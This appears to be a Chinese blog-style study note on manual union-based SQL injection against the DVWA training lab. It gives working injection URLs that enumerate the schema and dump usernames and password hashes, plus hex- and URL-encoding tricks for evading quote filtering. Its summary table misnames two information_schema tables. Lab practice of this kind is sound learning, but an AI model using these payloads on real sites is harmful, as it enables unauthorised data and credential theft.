- 注意注入点是字符型的。然后通过order by 3确定两列字段。
查找库名。注意group_concat 和concat的区别,concat 是会输出多个结果,group_concat 就一个结果汇聚了。
http://192.168.167.207/dvwa/vulnerabilities/sqli/?id=1 ' union select 1,group_concat(schema_name) from information_schema.schemata-- &Submit=Submit#
或者用database()
http://192.168.167.207/dvwa/vulnerabilities/sqli/?id=1 ' union select 1,group_concat(database()) -- &Submit=Submit#
image.png
-
找表
http://192.168.167.207/dvwa/vulnerabilities/sqli/?id=1 ' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa' -- &Submit=Submit# -
找列
http://192.168.167.207/dvwa/vulnerabilities/sqli/?id=1 ' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' -- &Submit=Submit#
image.png
- 看数据
用0x3a 代替了':'
http://192.168.167.207/dvwa/vulnerabilities/sqli/?id=1%27%20union select 1,group_concat(user,0x3a,password) from users -- &Submit=Submit
image.png
- 笔记
| · | select ? | from ? | where ? |
|---|---|---|---|
| 查库名 | schema_name | information_schema.schemata | |
| 查表名 | table_name | information_tables | table_schema |
| 查列名 | column_name | information_columns | table_name |
- 转码技巧
原来table_name = 'users' ,如果过滤单引号的话,我们可以将users转义到十六进制加0x,然后不用单引号查询
http://192.168.167.207/dvwa/vulnerabilities/sqli/?id=1%27%20union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 -- &Submit=Submit
或者又可以 table_name='%75%73%65%72%73'
参考链接 https://tipstrickshack.blogspot.com/2012/11/how-to-do-sql-injection-manually_7948.html
网友评论